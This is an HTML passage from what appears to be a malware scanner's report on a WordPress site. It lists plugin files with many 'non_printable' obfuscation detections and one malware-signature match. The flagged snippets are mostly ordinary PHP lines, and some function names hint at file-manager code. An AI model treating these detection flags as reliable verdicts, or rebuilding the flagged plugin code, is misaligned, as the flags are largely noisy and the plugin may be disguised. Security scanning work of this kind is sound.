<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1048576</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' MB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' KB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">. </span><span style="color: #DD0000">' By'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFileList</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">LoadFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$GetPath</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Y2hy</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_228").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/libs/eps-plugin-options.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 16.41 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 28</span><br><table id="file_229" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$out</span><span style="color: #007700">; } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setting_slug</span><span style="color: #007700">(</span><span style="color: #0000BB">$section </span><span style="color: #007700">= </span><span style="color: #DD0000">'general'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">config</span><span style="color: #007700">(</span><span style="color: #DD0000">'option_slug'</span><span style="color: #007700">) . </span><span style="color: #DD0000">'_' </span><span style="color: #007700">. </span><span style="color: #0000BB">$section</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_settings</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 166</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sanitize_inputs</span><span style="color: #007700">(</span><span style="color: #0000BB">$args</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 168</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$args</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">options_defaults</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 203</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">section_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$args</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">field_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$args</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">initialize the plugin settings page</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_options_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$func</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">config</span><span style="color: #007700">(</span><span style="color: #DD0000">'page_permission'</span><span style="color: #007700">), </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">config</span><span style="color: #007700">(</span><span style="color: #DD0000">'page_slug'</span><span style="color: #007700">), array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'do_admin_page'</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 253</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 260</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will create the admin page</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_admin_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_tab_nav</span><span style="color: #007700">(</span><span style="color: #0000BB">$current </span><span style="color: #007700">= </span><span style="color: #DD0000">'general'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 339</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_tab</span><span style="color: #007700">(</span><span style="color: #0000BB">$tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'general'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setting_section_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$tab</span><span style="color: #007700">, </span><span style="color: #0000BB">$suffix </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 367</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">config</span><span style="color: #007700">(</span><span style="color: #DD0000">'option_slug'</span><span style="color: #007700">) . </span><span style="color: #DD0000">'_settings_' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">settings</span><span style="color: #007700">[</span><span style="color: #0000BB">$tab</span><span style="color: #007700">][</span><span style="color: #DD0000">'callback'</span><span style="color: #007700">] . </span><span style="color: #0000BB">$suffix</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">tab_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$tab</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 388</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">pro_dialog</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">EPS_Redirects_Plugin $Plugin</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 505</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$out</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">build_settings</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_229").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/libs/UserAgentParser.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.31 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_230" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #0000BB">PLATFORM </span><span style="color: #007700">=> </span><span style="color: #0000BB">$platform </span><span style="color: #007700">?: </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">BROWSER </span><span style="color: #007700">=> </span><span style="color: #0000BB">$browser </span><span style="color: #007700">?: </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">BROWSER_VERSION </span><span style="color: #007700">=> </span><span style="color: #0000BB">$version </span><span style="color: #007700">?: </span><span style="color: #0000BB">null </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">null </span><span style="color: #007700">(</span><span style="color: #0000BB">to avoid undefined index errors</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #0000BB">PLATFORM </span><span style="color: #007700">=> </span><span style="color: #0000BB">$platform </span><span style="color: #007700">?: </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">BROWSER </span><span style="color: #007700">=> </span><span style="color: #0000BB">$result</span><span style="color: #007700">[</span><span style="color: #0000BB">BROWSER</span><span style="color: #007700">], </span><span style="color: #0000BB">BROWSER_VERSION </span><span style="color: #007700">=> empty(</span><span style="color: #0000BB">$result</span><span style="color: #007700">[</span><span style="color: #0000BB">BROWSER_VERSION</span><span style="color: #007700">]) ? </span><span style="color: #0000BB">null </span><span style="color: #007700">: </span><span style="color: #0000BB">$result</span><span style="color: #007700">[</span><span style="color: #0000BB">BROWSER_VERSION</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function ( </span><span style="color: #0000BB">$search</span><span style="color: #007700">, &</span><span style="color: #0000BB">$key </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, &</span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) use ( </span><span style="color: #0000BB">$lowerBrowser </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function ( array </span><span style="color: #0000BB">$search</span><span style="color: #007700">, &</span><span style="color: #0000BB">$key </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, &</span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) use ( </span><span style="color: #0000BB">$find </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">[] </span><span style="color: #0000BB">an </span><span style="color: #007700">array </span><span style="color: #0000BB">with </span><span style="color: #DD0000">'browser'</span><span style="color: #007700">, </span><span style="color: #DD0000">'version' </span><span style="color: #007700">and </span><span style="color: #DD0000">'platform' </span><span style="color: #0000BB">keys</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 210</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #0000BB">PLATFORM </span><span style="color: #007700">=> </span><span style="color: #0000BB">$platform </span><span style="color: #007700">?: </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">BROWSER </span><span style="color: #007700">=> </span><span style="color: #0000BB">$browser </span><span style="color: #007700">?: </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">BROWSER_VERSION </span><span style="color: #007700">=> </span><span style="color: #0000BB">$version </span><span style="color: #007700">?: </span><span style="color: #0000BB">null </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">eps_parse_user_agent</span><span style="color: #007700">( </span><span style="color: #0000BB">$u_agent </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return \</span><span style="color: #0000BB">epsdonatj</span><span style="color: #007700">\</span><span style="color: #0000BB">UserAgent</span><span style="color: #007700">\</span><span style="color: #0000BB">parse_user_agent</span><span style="color: #007700">(</span><span style="color: #0000BB">$u_agent</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
